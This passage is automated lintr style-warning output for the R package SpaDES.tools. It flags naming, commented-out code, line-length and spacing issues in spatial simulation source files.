^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           